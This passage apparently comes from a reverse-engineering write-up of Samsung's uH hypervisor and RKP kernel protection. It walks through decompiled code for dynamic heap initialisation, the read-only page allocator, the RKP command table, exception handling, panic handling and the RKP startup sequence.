if (get_env_var(FORCE_UPLOAD) == 5)
rmem_size = 0x2400000;
else
rmem_size = 0x1700000;
dtb_add_reserved_memory(dtb, offset, 0xC9000000, rmem_size, "sboot", "sboot,rmem");
}
// ...
}
int64_t uh_add_dynamic_region(int64_t addr, int64_t size) {
uh_call(0xC300C000, 2, addr, size, 0, 0);
return 0;
}
void uh_call(...) {
asm("hvc #0");
}
S-Boot will call command #2 for each memory
node in the DTB (the HVC arguments are the memory region address and size). It will then call command #4 (the arguments are two pointers to local variables of S-Boot).
int64_t init_cmd_add_dynamic_region(saved_regs_t* regs) {
// ...
if (uh_state.dynamic_heap_inited || !regs->x2 || !regs->x3)
return -1;
return memlist_add(&uh_state.dynamic_regions, regs->x2, regs->x3);
}
The command #2, that we named add_dynamic_region
, is used to add a memory range to the dynamic_regions
memlist, out of which will be carved the "dynamic heap" region of uH. S-Boot indicates to the hypervisor which physical memory regions it can access once DDR has been initialized.
int64_t init_cmd_initialize_dynamic_heap(saved_regs_t* regs) {
// ...
if (!regs->x2 || !regs->x3)
return -1;
PHYS_OFFSET = memlist_get_min_addr(&uh_state.dynamic_regions);
base = virt_to_phys_el1(regs->x2);
check_kernel_input(base);
size = virt_to_phys_el1(regs->x3);
check_kernel_input(size);
if (!base || !size) {
uh_log('L', "main.c", 188, "Wrong addr in dynamicheap : base: %p, size: %p", base, size);
return -1;
}
if (uh_state.dynamic_heap_inited)
return -1;
uh_state.dynamic_heap_inited = 1;
dynamic_heap_base = *base;
if (!regs->x4) {
memlist_merge_ranges(&uh_state.dynamic_regions);
memlist_dump(&uh_state.dynamic_regions);
some_size1 = memlist_get_some_size(&uh_state.dynamic_regions, 0x100000);
set_robuf_size(some_size1 + 0x600000);
some_size2 = memlist_get_some_size(&uh_state.dynamic_regions, 0x100000);
some_size3 = memlist_get_some_size(&uh_state.dynamic_regions, 0x200000);
dynamic_heap_size = (some_size1 + some_size2 + some_size3 + 0x7FFFFF) & 0xFFE00000;
} else {
dynamic_heap_size = *size;
}
if (!dynamic_heap_base) {
dynamic_heap_base = memlist_get_region_of_size(&uh_state.dynamic_regions, dynamic_heap_size, 0x200000);
} else {
if (memlist_remove(&uh_state.dynamic_regions, dynamic_heap_base, dynamic_heap_size)) {
uh_log('L', "main.c", 281, "[-] Dynamic heap address is not existed in memlist, base : %p", dynamic_heap_base);
return -1;
}
}
dynamic_heap_initialize(dynamic_heap_base, dynamic_heap_size);
uh_log('L', "main.c", 288, "[+] Dynamic heap initialized base: %lx, size: %lx", dynamic_heap_base, dynamic_heap_size);
*base = dynamic_heap_base;
*size = dynamic_heap_size;
mapped_start = dynamic_heap_base;
  if ((s2_map(dynamic_heap_base, dynamic_heap_size, UNKN1 | WRITE | READ, &mapped_start) & 0x8000000000000000) != 0) {
uh_log('L', "main.c", 299, "s2_map returned false, start : %p, size : %p", mapped_start, dynamic_heap_size);
return -1;
}
sparsemap_init("physmap", &uh_state.phys_map, &uh_state.dynamic_regions, 0x20, 0);
sparsemap_for_all_entries(&uh_state.phys_map, protected_ranges_add);
sparsemap_init("ro_bitmap", &uh_state.ro_bitmap, &uh_state.dynamic_regions, 1, 0);
sparsemap_init("dbl_bitmap", &uh_state.dbl_bitmap, &uh_state.dynamic_regions, 1, 0);
memlist_init(&uh_state.page_allocator.list);
memlist_add(&uh_state.page_allocator.list, dynamic_heap_base, dynamic_heap_size);
sparsemap_init("robuf", &uh_state.page_allocator.map, &uh_state.page_allocator.list, 1, 0);
allocate_robuf();
regions_end_addr = memlist_get_max_addr(&uh_state.dynamic_regions);
if ((regions_end_addr >> 33) <= 4) {
s2_unmap(regions_end_addr, 0xA00000000 - regions_end_addr);
s1_unmap(regions_end_addr, 0xA00000000 - regions_end_addr);
}
return 0;
}
The command #4, that we named initialize_dynamic_heap
, is used to finalize the list of memory regions and initialize the dynamic heap allocator. S-Boot calls it once all physical memory regions have been added using the previous command. This function does multiple things (some details are still unclear to us):
- it sets PHYS_OFFSET (physical address of kernel start) to the lowest address of the dynamic_regions memlist;
- it converts the two pointers passed by S-Boot from virtual to physical addresses and checks that they do not fall within protected memory;
- it determines the dynamic heap base and size (either from the values provided by S-Boot or computed from the dynamic_regions memlist) and removes that region from the dynamic_regions memlist;
- it calls dynamic_heap_initialize which, like for the static heap, saves the values in global variables and initializes the list of heap chunks, similarly to the static heap allocator;
- it maps the dynamic heap region as writable in the stage 2 page tables;
- it initializes the sparsemaps physmap, ro_bitmap and dbl_bitmap with the dynamic_regions memlist;
- it adds the entries of the physmap sparsemap to the protected_ranges memlist;
- it creates the memlist robuf_regions and adds the dynamic heap region to it;
- it initializes the sparsemap robuf with the robuf_regions memlist;
- it calls allocate_robuf which we are going to detail below;
- it unmaps everything between the end of the dynamic regions and 0xA00000000 from both the stage 2 and the EL2 stage 1 page tables (we don't know why it does that).

int64_t allocate_robuf() {
// ...
if (!uh_state.dynamic_heap_inited) {
uh_log('L', "page_allocator.c", 84, "Dynamic heap needs to be initialized");
return -1;
}
robuf_size = uh_state.page_allocator.robuf_size & 0xFFFFF000;
robuf_base = dynamic_heap_alloc(uh_state.page_allocator.robuf_size & 0xFFFFF000, 0x1000);
if (!robuf_base)
dynamic_heap_alloc_last_chunk(&robuf_base, &robuf_size);
if (!robuf_base) {
uh_log('L', "page_allocator.c", 96, "Robuffer Alloc Fail");
return -1;
}
if (robuf_size) {
offset = 0;
do {
zero_data_cache_page(robuf_base + offset);
offset += 0x1000;
} while (offset < robuf_size);
}
return page_allocator_init(&uh_state.page_allocator, robuf_base, robuf_size);
}
allocate_robuf
tries to allocate a region of robuf_size
from the dynamic heap allocator that was initialized moments ago, and if that fails, it grabs the last contiguous chunk of memory available in the allocator. It then calls page_allocator_init
with this memory region as argument. page_allocator_init
initializes the sparsemap and everything else that the page allocator will use. The page allocator, or "robuf" region, is what RKP will use to hand out read-only pages to the kernel (for the data protection feature, for example).
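For the kernel to get one of these pages, it has to ask RKP for it. As a purely hypothetical illustration (the actual Samsung kernel helper and its argument convention may differ), a kernel-side wrapper around command 0x11 (rkp_cmd_rkp_robuffer_alloc, listed in the APP_RKP command table below) could look like this:

/* Hypothetical kernel-side wrapper (not the actual Samsung code): asks RKP for a
 * page from the "robuf" region via command 0x11 and returns its virtual address.
 * We assume the physical address is written back through the pointer passed in
 * the first argument. */
static void *rkp_ro_page_alloc(void)
{
    u64 pa = 0;
    uh_call(UH_APP_RKP, 0x11, (u64)__pa(&pa), 0, 0, 0);
    return pa ? (void *)__va(pa) : NULL;
}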
APP_RKP
The command handlers registered for APP_RKP
are:
Command ID | Command Handler | Maximum Calls |
---|---|---|
0x00 | rkp_cmd_init | 0 |
0x01 | rkp_cmd_start | 1 |
0x02 | rkp_cmd_deferred_start | 1 |
0x03 | rkp_cmd_write_pgt1 | - |
0x04 | rkp_cmd_write_pgt2 | - |
0x05 | rkp_cmd_write_pgt3 | - |
0x06 | rkp_cmd_emult_ttbr0 | - |
0x07 | rkp_cmd_emult_ttbr1 | - |
0x08 | rkp_cmd_emult_doresume | - |
0x09 | rkp_cmd_free_pgd | - |
0x0A | rkp_cmd_new_pgd | - |
0x0B | rkp_cmd_kaslr_mem | 0 |
0x0D | rkp_cmd_jopp_init | 1 |
0x0E | rkp_cmd_ropp_init | 1 |
0x0F | rkp_cmd_ropp_save | 0 |
0x10 | rkp_cmd_ropp_reload | - |
0x11 | rkp_cmd_rkp_robuffer_alloc | - |
0x12 | rkp_cmd_rkp_robuffer_free | - |
0x13 | rkp_cmd_get_ro_bitmap | 1 |
0x14 | rkp_cmd_get_dbl_bitmap | 1 |
0x15 | rkp_cmd_get_rkp_get_buffer_bitmap | 1 |
0x17 | rkp_cmd_id_0x17 | - |
0x18 | rkp_cmd_set_sctlr_el1 | - |
0x19 | rkp_cmd_set_tcr_el1 | - |
0x1A | rkp_cmd_set_contextidr_el1 | - |
0x1B | rkp_cmd_id_0x1B | - |
0x20 | rkp_cmd_dynamic_load | - |
0x40 | rkp_cmd_cred_init | 1 |
0x41 | rkp_cmd_assign_ns_size | 1 |
0x42 | rkp_cmd_assign_cred_size | 1 |
0x43 | rkp_cmd_pgd_assign | - |
0x44 | rkp_cmd_cred_set_fp | - |
0x45 | rkp_cmd_cred_set_security | - |
0x46 | rkp_cmd_assign_creds | - |
0x48 | rkp_cmd_ro_free_pages | - |
0x4A | rkp_cmd_prot_dble_map | - |
0x4B | rkp_cmd_mark_ppt | - |
0x4E | rkp_cmd_set_pages_ro_tsec_jar | - |
0x4F | rkp_cmd_set_pages_ro_vfsmnt_jar | - |
0x50 | rkp_cmd_set_pages_ro_cred_jar | - |
0x51 | rkp_cmd_id_0x51 | 1 |
0x52 | rkp_cmd_init_ns | - |
0x53 | rkp_cmd_ns_set_root_sb | - |
0x54 | rkp_cmd_ns_set_flags | - |
0x55 | rkp_cmd_ns_set_data | - |
0x56 | rkp_cmd_ns_set_sys_vfsmnt | 5 |
0x57 | rkp_cmd_id_0x57 | - |
0x60 | rkp_cmd_selinux_initialized | - |
0x81 | rkp_cmd_test_get_par | 0 |
0x82 | rkp_cmd_test_get_wxn | 0 |
0x83 | rkp_cmd_test_ro_range | 0 |
0x84 | rkp_cmd_test_get_va_xn | 0 |
0x85 | rkp_check_vmm_unmapped | 0 |
0x86 | rkp_cmd_test_ro | 0 |
0x87 | rkp_cmd_id_0x87 | 0 |
0x88 | rkp_cmd_check_splintering_point | 0 |
0x89 | rkp_cmd_id_0x89 | 0 |
Let's take a look at command #0 called during startup by uH.
int64_t rkp_cmd_init() {
rkp_panic_on_violation = 1;
rkp_init_cmd_counts();
cs_init(&rkp_start_lock);
return 0;
}
The command #0 handler of APP_RKP
is also really simple. It sets the maximum number of times each command can be called (enforced by the "checker" function) by calling rkp_init_cmd_counts
and initializes the critical section that will be used by the "start" and "deferred start" commands (more on that later).
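Based on the "Maximum Calls" column of the table above, the checker presumably keeps a table of remaining call counts per command; here is a sketch of the idea (ours, not the decompiled function):

/* Sketch (ours) of how the command "checker" could enforce the maximum call
 * counts: one counter per command, where a negative value means the command can
 * be called an unlimited number of times. The array size is assumed. */
int64_t rkp_cmd_checker_sketch(uint64_t cmd_id) {
    extern int32_t rkp_cmd_counts[0x8A]; /* filled in by rkp_init_cmd_counts() */
    if (cmd_id >= 0x8A)
        return -1;
    if (rkp_cmd_counts[cmd_id] == 0)
        return -1; /* already called its maximum number of times */
    if (rkp_cmd_counts[cmd_id] > 0)
        rkp_cmd_counts[cmd_id]--;
    return 0;
}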
An important part of a hypervisor is its exception handling code. These handling functions are going to be called on invalid memory accesses by the kernel, when the kernel executes an HVC instruction, etc. They can be found by looking at the vector table specified in the VBAR_EL2
register. We have seen in vmm_init
that the vector table is at vmm_vector_table
. From the ARMv8 specifications, it has the following structure:
Address | Exception Type | Description |
---|---|---|
+0x000 | Synchronous | Current EL with SP0 |
+0x080 | IRQ/vIRQ | |
+0x100 | FIQ/vFIQ | |
+0x180 | SError/vSError | |
+0x200 | Synchronous | Current EL with SPx |
+0x280 | IRQ/vIRQ | |
+0x300 | FIQ/vFIQ | |
+0x380 | SError/vSError | |
+0x400 | Synchronous | Lower EL using AArch64 |
+0x480 | IRQ/vIRQ | |
+0x500 | FIQ/vFIQ | |
+0x580 | SError/vSError | |
+0x600 | Synchronous | Lower EL using AArch32 |
+0x680 | IRQ/vIRQ | |
+0x700 | FIQ/vFIQ | |
+0x780 | SError/vSError |
Our device has a 64-bit kernel executing at EL1, so the command dispatch happens in the exception handler at vmm_vector_table
+0x400, but all the handlers end up calling the same function anyway:
void exception_handler(...) {
// ...
// Save registers x0 to x30, sp_el1, elr_el2, spsr_el2
// ...
vmm_dispatch(<level>, <type>, ®s);
asm("clrex");
asm("eret");
}
vmm_dispatch
is given as arguments the level and type of the exception that has been taken.
int64_t vmm_dispatch(int64_t level, int64_t type, saved_regs_t* regs) {
// ...
if (has_panicked)
vmm_panic(level, type, regs, "panic on another core");
switch (type) {
case 0x0:
if (vmm_synchronous_handler(level, type, regs))
vmm_panic(level, type, regs, "syncronous handler failed");
break;
case 0x80:
uh_log('D', "vmm.c", 1132, "RKP_e3b85960");
break;
case 0x100:
uh_log('D', "vmm.c", 1135, "RKP_6d732e0a");
break;
case 0x180:
uh_log('D', "vmm.c", 1149, "RKP_3c71de0a");
break;
default:
return 0;
}
return 0;
}
vmm_dispatch
, in the case of synchronous exception, will call vmm_synchronous_handler
.
int64_t vmm_synchronous_handler(int64_t level, int64_t type, saved_regs_t* regs) {
// ...
esr_el2 = get_esr_el2();
switch (esr_el2 >> 26) {
case 0x12: /* HVC instruction execution in AArch32 state */
case 0x16: /* HVC instruction execution in AArch64 state */
if ((regs->x0 & 0xFFFFF000) == 0xC300C000) {
cmd_id = regs->x1;
app_id = regs->x0;
cpu_num = get_current_cpu();
if (cpu_num <= 7)
uh_state.injections[cpu_num] = 0;
uh_handle_command(app_id, cmd_id, regs);
}
return 0;
case 0x18: /* Trapped MSR, MRS or Sys. ins. execution in AArch64 state */
if ((esr_el2 & 1) == 0 && !other_msr_mrs_system(®s->x0, esr_el2_1 & 0x1FFFFFF))
return 0;
vmm_panic(level, type, regs, "other_msr_mrs_system failure");
return 0;
case 0x20: /* Instruction Abort from a lower EL */
cs_enter(&s2_lock);
el1_va_to_ipa(get_elr_el2(), &ipa);
get_s2_1gb_page(ipa, &fld);
print_s2_fld(fld);
if ((fld & 3) == 3) {
get_s2_2mb_page(ipa, &sld);
print_s2_sld(sld);
if ((sld & 3) == 3) {
get_s2_4kb_page(ipa, &tld);
print_s2_tld(tld);
}
}
cs_exit(&s2_lock);
if (should_skip_prefetch_abort() == 1)
return 0;
if (!esr_ec_prefetch_abort_from_a_lower_exception_level("-snip-")) {
print_vmm_registers(regs);
return 0;
}
vmm_panic(level, type, regs, "esr_ec_prefetch_abort_from_a_lower_exception_level");
return 0;
case 0x21: /* Instruction Abort taken without a change in EL */
uh_log('L', "vmm.c", 920, "esr abort iss: 0x%x", esr_el2 & 0x1FFFFFF);
vmm_panic(level, type, regs, "esr_ec_prefetch_abort_taken_without_a_change_in_exception_level");
case 0x24: /* Data Abort from a lower EL */
if (!rkp_fault(regs))
return 0;
if ((esr_el2 & 0x3F) == 7) // Translation fault, level 3
{
va = rkp_get_va(get_hpfar_el2() << 8);
cs_enter(&s2_lock);
res = el1_va_to_pa(va, &ipa);
if (!res) {
uh_log('L', "vmm.c", 994, "Skipped data abort va: %p, ipa: %p", va, ipa);
cs_exit(&s2_lock);
return 0;
}
cs_exit(&s2_lock);
}
if ((esr_el2 & 0x7C) == 76) // Permission fault, any level
{
va = rkp_get_va(get_hpfar_el2() << 8);
at_s12e1w(va);
if ((get_par_el1() & 1) == 0) {
print_el2_state();
invalidate_entire_s1_s2_el1_tlb();
return 0;
}
}
el1_va_to_ipa(get_elr_el2(), &ipa);
get_s2_1gb_page(ipa, &fld);
print_s2_fld(fld);
if ((fld & 3) == 3) {
get_s2_2mb_page(ipa, &sld);
print_s2_sld(sld);
if ((sld & 3) == 3) {
get_s2_4kb_page(ipa, &tld);
print_s2_tld(tld);
}
}
if (esr_ec_prefetch_abort_from_a_lower_exception_level("-snip-"))
vmm_panic(level, type, regs, "esr_ec_data_abort_from_a_lower_exception_level");
else
print_vmm_registers(regs);
return 0;
case 0x25: /* Data Abort taken without a change in EL */
vmm_panic(level, type, regs, "esr_ec_data_abort_taken_without_a_change_in_exception_level");
return 0;
default:
return -1;
}
}
vmm_synchronous_handler first gets the exception class by reading the ESR_EL2 register, and handles each class as follows:

- for HVC instructions (executed in AArch32 or AArch64 state), if X0 contains a uH command identifier (0xC300CXXX), it resets the current CPU's entry in the injections array of uh_state and calls the uh_handle_command function with the app_id in X0 and cmd_id in X1;
- for trapped MSR, MRS or system instructions, it calls the other_msr_mrs_system function with the register that was being written to;
  - other_msr_mrs_system gets the value that was being written from the saved registers;
  - it calls uh_panic if the register is not allowed to be written to, or checks if the new value is valid (if specific bits have a fixed value);
  - it updates the ELR_EL2 register to make it point to the next instruction;
- for instruction aborts from a lower EL, it logs the stage 2 descriptors of the faulting address, then calls should_skip_prefetch_abort;
  - the abort is ignored if should_skip_prefetch_abort returns 1, otherwise it panics or simply prints the registers depending on the result of esr_ec_prefetch_abort_from_a_lower_exception_level;
- for instruction aborts taken without a change in EL (i.e. coming from the hypervisor itself), it panics;
- for data aborts from a lower EL, it calls rkp_fault to detect RKP faults, that is writes made by the kernel to memory that RKP protects (among other things it checks that the faulting instruction is str x2, [x1], and writes to protected page tables are handled by rkp_l1pgt_write, rkp_l2pgt_write or rkp_l3pgt_write depending on the page table level);
  - benign faults (stale level 3 translation faults or permission faults that no longer reproduce) are simply skipped;
  - otherwise it logs the stage 2 descriptors of the faulting address and, like for instruction aborts, panics or prints the registers depending on esr_ec_prefetch_abort_from_a_lower_exception_level;
- for data aborts taken without a change in EL, it panics.

crit_sec_t* vmm_panic(int64_t level, int64_t type, saved_regs_t* regs, char* message) {
// ...
uh_log('L', "vmm.c", 1171, ">>vmm_panic<<");
cs_enter(&panic_cs);
uh_log('L', "vmm.c", 1175, "message: %s", message);
switch (level) {
case 0x0:
uh_log('L', "vmm.c", 1179, "level: VMM_EXCEPTION_LEVEL_TAKEN_FROM_CURRENT_WITH_SP_EL0");
break;
case 0x200:
uh_log('L', "vmm.c", 1182, "level: VMM_EXCEPTION_LEVEL_TAKEN_FROM_CURRENT_WITH_SP_ELX");
break;
case 0x400:
uh_log('L', "vmm.c", 1185, "level: VMM_EXCEPTION_LEVEL_TAKEN_FROM_LOWER_USING_AARCH64");
break;
case 0x600:
uh_log('L', "vmm.c", 1188, "level: VMM_EXCEPTION_LEVEL_TAKEN_FROM_LOWER_USING_AARCH32");
break;
default:
uh_log('L', "vmm.c", 1191, "level: VMM_UNKNOWN\n");
break;
}
switch (type) {
case 0x0:
uh_log('L', "vmm.c", 1197, "type: VMM_EXCEPTION_TYPE_SYNCHRONOUS");
break;
case 0x80:
uh_log('L', "vmm.c", 1200, "type: VMM_EXCEPTION_TYPE_IRQ_OR_VIRQ");
break;
case 0x100:
uh_log('L', "vmm.c", 1203, "type: VMM_SYSCALL\n");
break;
case 0x180:
uh_log('L', "vmm.c", 1206, "type: VMM_EXCEPTION_TYPE_SERROR_OR_VSERROR");
break;
default:
uh_log('L', "vmm.c", 1209, "type: VMM_UNKNOWN\n");
break;
}
print_vmm_registers(regs);
if ((get_sctlr_el1() & 1) == 0 || type != 0 || (level == 0 || level == 0x200)) {
has_panicked = 1;
cs_exit(&panic_cs);
if (!strcmp(message, "panic on another core"))
exynos_reset(0x8800);
uh_panic();
}
uh_panic_el1(uh_state.fault_handler, regs);
return cs_exit(&panic_cs);
}
vmm_panic logs the panic message, exception level and type, and if either:

- the MMU is disabled at EL1 (SCTLR_EL1.M is 0);
- the exception type is not synchronous;
- the exception was taken from the current EL (i.e. from the hypervisor itself);

then it calls uh_panic, otherwise it calls uh_panic_el1.
void uh_panic() {
uh_log('L', "main.c", 482, "uh panic!");
print_state_and_reset();
}
void print_state_and_reset() {
uh_log('L', "panic.c", 29, "count state - page_ro: %lx, page_free: %lx, s2_breakdown: %lx", page_ro, page_free,
s2_breakdown);
print_el2_state();
print_el1_state();
print_stack_contents();
bigdata_store_data();
has_panicked = 1;
exynos_reset(0x8800);
}
uh_panic
logs the EL1 and EL2 system register values and the hypervisor and kernel stack contents, copies a textual version of those into the "bigdata" region, and then reboots the device.
int64_t uh_panic_el1(uh_handler_list_t* fault_handler, saved_regs_t* regs) {
// ...
uh_log('L', "vmm.c", 111, ">>uh_panic_el1<<");
if (!fault_handler) {
uh_log('L', "vmm.c", 113, "uH handler did not registered");
uh_panic();
}
print_el2_state();
print_el1_state();
print_stack_contents();
cpu_num = get_current_cpu();
if (cpu_num <= 7) {
something = cpu_num - 0x21530000;
if (uh_state.injections[cpu_num] == something)
uh_log('D', "vmm.c", 99, "Injection locked");
uh_state.injections[cpu_num] = something;
}
handler_data = &fault_handler->uh_handler_data[cpu_num];
handler_data->esr_el2 = get_esr_el2();
handler_data->elr_el2 = get_elr_el2();
handler_data->hcr_el2 = get_hcr_el2();
handler_data->far_el2 = get_far_el2();
handler_data->hpfar_el2 = get_hpfar_el2() << 8;
if (regs)
memcpy(fault_handler->uh_handler_data[cpu_num].regs.regs, regs, 272);
set_elr_el2(fault_handler->uh_handler);
return 0;
}
uh_panic_el1
fills the structure that was specified in the command #0 of APP_INIT
that we have just seen. It also sets ELR_EL2
to the handler function so that it will be called upon executing the ERET
instruction.
RKP startup is performed in two stages using two different commands:
- the "start" command is called in start_kernel, right after mm_init;
- the "deferred start" command is called in kernel_init, right before starting init.

On the kernel side, the "start" command is called in rkp_init, still in init/main.c.
rkp_init_t rkp_init_data __rkp_ro = {
.magic = RKP_INIT_MAGIC,
.vmalloc_start = VMALLOC_START,
.no_fimc_verify = 0,
.fimc_phys_addr = 0,
._text = (u64)_text,
._etext = (u64)_etext,
._srodata = (u64)__start_rodata,
._erodata = (u64)__end_rodata,
.large_memory = 0,
};
static void __init rkp_init(void)
{
// ...
rkp_init_data.vmalloc_end = (u64)high_memory;
rkp_init_data.init_mm_pgd = (u64)__pa(swapper_pg_dir);
rkp_init_data.id_map_pgd = (u64)__pa(idmap_pg_dir);
rkp_init_data.tramp_pgd = (u64)__pa(tramp_pg_dir);
#ifdef CONFIG_UH_RKP_FIMC_CHECK
rkp_init_data.no_fimc_verify = 1;
#endif
rkp_init_data.tramp_valias = (u64)TRAMP_VALIAS;
rkp_init_data.zero_pg_addr = (u64)__pa(empty_zero_page);
// ...
uh_call(UH_APP_RKP, RKP_START, (u64)&rkp_init_data, (u64)kimage_voffset, 0, 0);
}
asmlinkage __visible void __init start_kernel(void)
{
// ...
rkp_init();
// ...
}
On the hypervisor side, the command handler is as follows:
int64_t rkp_cmd_start(saved_regs_t* regs) {
// ...
cs_enter(&rkp_start_lock);
if (rkp_inited) {
cs_exit(&rkp_start_lock);
uh_log('L', "rkp.c", 133, "RKP is already started");
return -1;
}
res = rkp_start(regs);
cs_exit(&rkp_start_lock);
return res;
}
rkp_cmd_start
calls rkp_start
which does the real work.
int64_t rkp_start(saved_regs_t* regs) {
// ...
KIMAGE_VOFFSET = regs->x3;
rkp_init_data = rkp_get_pa(regs->x2);
if (rkp_init_data->magic - 0x5AFE0001 >= 2) {
uh_log('L', "rkp_init.c", 85, "RKP INIT-Bad Magic(%d), %p", regs->x2, rkp_init_data);
return -1;
}
if (rkp_init_data->magic == 0x5AFE0002) {
rkp_init_cmd_counts_test();
rkp_test = 1;
}
INIT_MM_PGD = rkp_init_data->init_mm_pgd;
ID_MAP_PGD = rkp_init_data->id_map_pgd;
ZERO_PG_ADDR = rkp_init_data->zero_pg_addr;
TRAMP_PGD = rkp_init_data->tramp_pgd;
TRAMP_VALIAS = rkp_init_data->tramp_valias;
VMALLOC_START = rkp_init_data->vmalloc_start;
VMALLOC_END = rkp_init_data->vmalloc_end;
TEXT = rkp_init_data->_text;
ETEXT = rkp_init_data->_etext;
TEXT_PA = rkp_get_pa(TEXT);
ETEXT_PA = rkp_get_pa(ETEXT);
SRODATA = rkp_init_data->_srodata;
ERODATA = rkp_init_data->_erodata;
TRAMP_PGD_PAGE = TRAMP_PGD & 0xFFFFFFFFF000;
INIT_MM_PGD_PAGE = INIT_MM_PGD & 0xFFFFFFFFF000;
LARGE_MEMORY = rkp_init_data->large_memory;
page_ro = 0;
page_free = 0;
s2_breakdown = 0;
pmd_allocated_by_rkp = 0;
NO_FIMC_VERIFY = rkp_init_data->no_fimc_verify;
if (rkp_bitmap_init() < 0) {
uh_log('L', "rkp_init.c", 150, "Failed to init bitmap");
return -1;
}
memlist_init(&executable_regions);
memlist_set_field_14(&executable_regions);
memlist_add(&executable_regions, TEXT, ETEXT - TEXT);
if (TRAMP_VALIAS)
memlist_add(&executable_regions, TRAMP_VALIAS, 0x1000);
memlist_init(&dynamic_load_regions);
memlist_set_field_14(&dynamic_load_regions);
put_last_dynamic_heap_chunk_in_static_heap();
if (rkp_paging_init() < 0) {
uh_log('L', "rkp_init.c", 169, "rkp_pging_init fails");
return -1;
}
rkp_inited = 1;
if (rkp_l1pgt_process_table(get_ttbr0_el1() & 0xFFFFFFFFF000, 0, 1) < 0) {
uh_log('L', "rkp_init.c", 179, "processing l1pgt fails");
return -1;
}
uh_log('L', "rkp_init.c", 183, "[*] HCR_EL2: %lx, SCTLR_EL2: %lx", get_hcr_el2(), get_sctlr_el2());
uh_log('L', "rkp_init.c", 184, "[*] VTTBR_EL2: %lx, TTBR0_EL2: %lx", get_vttbr_el2(), get_ttbr0_el2());
uh_log('L', "rkp_init.c", 185, "[*] MAIR_EL1: %lx, MAIR_EL2: %lx", get_mair_el1(), get_mair_el2());
uh_log('L', "rkp_init.c", 186, "RKP Activated");
return 0;
}
Let's break down this function:

- it saves the kernel image virtual/physical offset into KIMAGE_VOFFSET;
- it converts rkp_init_data (passed in X2) from a virtual address to a physical address. It does so by calling the rkp_get_pa function;
- it checks the magic field. If it is the test mode magic, then it calls rkp_init_cmd_counts_test which allows test commands 0x81-0x88 to be called an unlimited amount of times;
- it copies the fields of rkp_init_data into global variables;
- it initializes the memlist executable_regions and adds the text section of the kernel to it, and does the same with the TRAMP_VALIAS page if provided;
- it initializes the memlist dynamic_load_regions which is used for the "dynamic executable loading" feature of RKP (more on that at the end of the blog post);
- it calls put_last_dynamic_heap_chunk_in_static_heap (the end result on our device is that the static heap acquires all the unused dynamic memory and the dynamic heap doesn't have any memory left);
- it calls rkp_paging_init and rkp_l1pgt_process_table that we will detail below.

int64_t rkp_paging_init() {
// ...
if (!TEXT || (TEXT & 0xFFF) != 0) {
uh_log('L', "rkp_paging.c", 637, "kernel text start is not aligned, stext : %p", TEXT);
return -1;
}
if (!ETEXT || (ETEXT & 0xFFF) != 0) {
uh_log('L', "rkp_paging.c", 642, "kernel text end is not aligned, etext : %p", ETEXT);
return -1;
}
if (TEXT_PA <= get_base() && ETEXT_PA > get_base())
return -1;
if (s2_unmap(0x87000000, 0x200000))
return -1;
if (rkp_phys_map_set_region(TEXT_PA, ETEXT - TEXT, TEXT) < 0) {
uh_log('L', "rkp_paging.c", 435, "physmap set failed for kernel text");
return -1;
}
if (s1_map(TEXT_PA, ETEXT - TEXT, UNKN1 | READ)) {
uh_log('L', "rkp_paging.c", 447, "Failed to make VMM S1 range RO");
return -1;
}
if (INIT_MM_PGD >= TEXT_PA && INIT_MM_PGD < ETEXT_PA && s1_map(INIT_MM_PGD, 0x1000, UNKN1 | WRITE | READ)) {
uh_log('L', "rkp_paging.c", 454, "failed to make swapper_pg_dir RW");
return -1;
}
rkp_phys_map_lock(ZERO_PG_ADDR);
if (rkp_s2_page_change_permission(ZERO_PG_ADDR, 0, 1, 1) < 0) {
uh_log('L', "rkp_paging.c", 462, "Failed to make executable for empty_zero_page");
return -1;
}
rkp_phys_map_unlock(ZERO_PG_ADDR);
if (rkp_set_kernel_rox(0))
return -1;
if (rkp_s2_range_change_permission(0x87100000, 0x87140000, 0x80, 1, 1) < 0) {
uh_log('L', "rkp_paging.c", 667, "Failed to make UH_LOG region RO");
return -1;
}
if (!uh_state.dynamic_heap_inited)
return 0;
if (rkp_s2_range_change_permission(uh_state.dynamic_heap_base,
uh_state.dynamic_heap_base + uh_state.dynamic_heap_size, 0x80, 1, 1) < 0) {
uh_log('L', "rkp_paging.c", 685, "Failed to make dynamic_heap region RO");
return -1;
}
return 0;
}
Let's break down rkp_paging_init as well:

- it checks that the kernel text start and end addresses are page-aligned;
- it checks that the hypervisor base address is not contained in the kernel text;
- it unmaps the uH region from the EL1 stage 2 (so the kernel can no longer access it);
- it sets the kernel text region to TEXT (name is our own) in the phys_map;
- it maps the kernel text as read-only in the EL2 stage 1;
- it remaps swapper_pg_dir as RW in EL2 stage 1 (if it is located within the kernel text);
- it makes empty_zero_page ROX in EL1 stage 2;
- it calls rkp_set_kernel_rox that we will detail below;
- it makes the uH log region and the dynamic heap region read-only in EL1 stage 2.

int64_t rkp_set_kernel_rox(int64_t access) {
// ...
erodata_pa = rkp_get_pa(ERODATA);
if (rkp_s2_range_change_permission(TEXT_PA, erodata_pa, access, 1, 1) < 0) {
uh_log('L', "rkp_paging.c", 392, "Failed to make Kernel range ROX");
return -1;
}
if (access)
return 0;
if (((erodata_pa | ETEXT_PA) & 0xFFF) != 0) {
uh_log('L', "rkp_paging.c", 158, "start or end addr is not aligned, %p - %p", ETEXT_PA, erodata_pa);
return 0;
}
if (ETEXT_PA > erodata_pa) {
uh_log('L', "rkp_paging.c", 163, "start addr is bigger than end addr %p, %p", ETEXT_PA, erodata_pa);
return 0;
}
paddr = ETEXT_PA;
  while (sparsemap_set_value_addr(&uh_state.ro_bitmap, paddr, 1) >= 0) {
paddr += 0x1000;
if (paddr >= erodata_pa)
return 0;
uh_log('L', "rkp_paging.c", 171, "set_pgt_bitmap fail, %p", paddr);
}
return 0;
}
rkp_set_kernel_rox
makes the range [kernel text start; rodata end] RWX in the EL1 stage 2 (yes, RWX: the access argument is 0 here, but this function will be called again later with 0x80, making it RO), then it marks the range [kernel text end; rodata end] as read-only in the ro_bitmap sparsemap.
After rkp_paging_init
, rkp_start
calls rkp_l1pgt_process_table
to process the page tables (mainly about making the 3 levels of tables read-only). It calls this function on the value of TTBR0_EL1
register.
On the kernel side, this command is called in rkp_deferred_init
in include/linux/rkp.h
.
// from include/linux/rkp.h
static inline void rkp_deferred_init(void){
uh_call(UH_APP_RKP, RKP_DEFERRED_START, 0, 0, 0, 0);
}
// from init/main.c
static int __ref kernel_init(void *unused)
{
// ...
rkp_deferred_init();
// ...
}
On the hypervisor side, the command handler is as follows:
int64_t rkp_cmd_deferred_start() {
return rkp_deferred_start();
}
